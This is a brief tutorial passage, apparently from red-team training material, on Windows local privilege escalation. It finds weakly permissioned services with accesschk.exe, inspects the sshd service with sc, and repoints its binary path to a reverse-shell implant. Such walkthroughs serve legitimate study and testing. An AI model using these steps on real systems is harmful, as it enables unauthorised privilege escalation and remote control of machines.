now we need to check if any service can be modified

this command check if there is any service modifiable by everyone

accesschk.exe -accepteula -wuvc "Everyone" *

this command check if there is any service modifiable by users

accesschk.exe -accepteula -wuvc "Users" *

this command check if there is any service modifiable by authenticated users

accesschk.exe -accepteula -wuvc "Authenticated Users" *

as we see we got the service sshd which we have read and write access to

now let’s query the service to see what can we do with it

sc query sshd

as we see the service is stopped

now let’s query the service configrations

sc qc sshd

now let’s change the service binary path to our malicious reverse shell

sc config sshd binPath= "c:\\rto\\lpe\\implant\\implant.exe"

and then run it